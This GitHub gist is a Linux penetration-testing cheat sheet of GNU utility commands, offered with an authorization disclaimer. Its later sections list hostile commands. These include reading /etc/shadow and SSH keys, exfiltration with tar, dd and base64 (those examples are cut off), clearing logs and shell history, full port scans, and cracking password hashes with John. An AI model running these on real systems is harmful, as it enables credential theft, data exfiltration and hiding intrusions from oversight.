Skip to content

Instantly share code, notes, and snippets.

@copyleftdev

copyleftdev/gist:be99c8be50e2119a979aa275fe165e8d

Created August 24, 2024 06:56
Show Gist options
  • Save copyleftdev/be99c8be50e2119a979aa275fe165e8d to your computer and use it in GitHub Desktop.
Save copyleftdev/be99c8be50e2119a979aa275fe165e8d to your computer and use it in GitHub Desktop.
Download ZIP
Linux Penetration Testing with GNU Utils: The Ultimate Cheat Sheet
Raw
gistfile1.md

🐧 Linux Penetration Testing with GNU Utils: The Ultimate Cheat Sheet

DISCLAIMER: This information is for educational purposes only. Always obtain proper authorization before performing any penetration testing activities. Unauthorized testing is illegal and unethical.

πŸ” Information Gathering

Command Description Example
netstat 🌐 Network connections, routing tables, interface statistics netstat -tuln
ss πŸ”Œ Socket statistics ss -tuln
ip πŸ–§ Show / manipulate routing, devices, policy routing and tunnels ip addr show
arp πŸ“Ÿ Manipulate the system ARP cache arp -e
dig πŸ” DNS lookup utility dig example.com

πŸ’» System Enumeration

Command Description Example
uname πŸ’» Print system information uname -a
lsof πŸ“‚ List open files lsof -i
ps πŸ“Š Report process status ps aux
who πŸ‘₯ Show who is logged on who
w πŸ‘€ Show who is logged on and what they are doing w

πŸ”“ File and Directory Operations

Command Description Example
find πŸ”Ž Search for files in a directory hierarchy find / -perm -4000 2>/dev/null
grep πŸ” Search file patterns grep -r "password" /etc/
sed πŸ”„ Stream editor for filtering and transforming text sed -i 's/old/new/g' file.txt
awk πŸ”§ Pattern scanning and processing language awk -F: '{print $1}' /etc/passwd

πŸ” User and Permission Management

Command Description Example
id πŸ†” Print user and group information id
sudo πŸ”‘ Execute a command as another user sudo -l
su πŸ‘€ Change user ID or become superuser su - username
chmod πŸ”’ Change file mode bits chmod 600 file.txt
chown πŸ‘‘ Change file owner and group chown user:group file.txt

🌐 Network Probing

Command Description Example
ping πŸ“‘ Send ICMP ECHO_REQUEST to network hosts ping -c 4 192.168.1.1
traceroute πŸ—ΊοΈ Print the route packets trace to network host traceroute example.com
nc πŸ”Œ TCP/IP swiss army knife nc -zv 192.168.1.1 1-1000
curl 🌐 Transfer data from or to a server curl -I http://example.com
wget πŸ“₯ Non-interactive network downloader wget http://example.com/file.txt

πŸ“‘ Simple Servers

Command Description Example
python -m SimpleHTTPServer 🌐 Start a simple HTTP server python -m SimpleHTTPServer 8000
nc -l πŸ‘‚ Create a simple listening server nc -l -p 8000

πŸ”¬ Post Exploitation

Command Description Example
cat /etc/passwd πŸ‘₯ View user accounts cat /etc/passwd
cat /etc/shadow πŸ”‘ View password hashes (requires root) cat /etc/shadow
cat /etc/group πŸ‘₯ View groups cat /etc/group
ls -la /etc/cron* ⏰ List cron jobs ls -la /etc/cron*
ls -la ~/.ssh/ πŸ”‘ List SSH keys ls -la ~/.ssh/
history πŸ“œ View command history history

πŸ“‘ Data Exfiltration

Command Description Example
tar πŸ“¦ Create a tarball `tar czf - /important
dd πŸ’Ύ Convert and copy a file `dd if=/dev/sda
base64 πŸ”‘ Base64 encode/decode data `base64 secretfile

🧹 Covering Tracks

Command Description Example
history -c 🧽 Clear bash history history -c
echo "" > ~/.bash_history 🧼 Clear bash history file echo "" > ~/.bash_history
shred πŸ”₯ Overwrite a file to hide its contents shred -zu access.log
unset HISTFILE 🚫 Disable bash history unset HISTFILE

πŸ”„ Useful One-Liners

# πŸ” Find all SUID executables
find / -perm -4000 -type f 2>/dev/null

# πŸ”Ž Find writable directories
find / -writable -type d 2>/dev/null

# 🌐 Scan for open ports
for p in {1..65535}; do nc -zv 192.168.1.1 $p 2>&1 | grep -v 'Connection refused'; done

# πŸ”‘ Generate a wordlist from website
curl http://example.com | grep -oE '\w+' | sort -u > wordlist.txt

# πŸ‘₯ Extract usernames from /etc/passwd
awk -F: '{print $1}' /etc/passwd

# πŸ“Ά Monitor network traffic
tcpdump -i eth0 -nn -s0 -v port 80

# πŸ”“ Crack /etc/shadow passwords with John (if installed)
unshadow /etc/passwd /etc/shadow > mypasswd && john mypasswd

πŸ† Pro Tips

  1. πŸ”§ Master text manipulation tools like sed, awk, and grep.
  2. πŸ“š Familiarize yourself with /proc filesystem for live system information.
  3. πŸ” Use openssl for encryption/decryption when needed.
  4. πŸ“‘ Leverage bash built-ins for network operations when other tools aren't available.
  5. 🧠 Combine commands with pipes (|) for powerful operations.
  6. πŸ” Use command substitution ($(command)) to use output of one command as arguments for another.
  7. πŸ“œ Create simple scripts to automate repetitive tasks.
  8. πŸ” Always clean up after your testing activities.
  9. πŸ“š Study man pages to discover lesser-known features of GNU utilities.
  10. πŸ§ͺ Practice in a controlled environment before real-world application.

Remember, these tools should only be used ethically and with explicit permission. Always respect legal and ethical boundaries in your security testing. πŸ›‘οΈπŸ”“

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment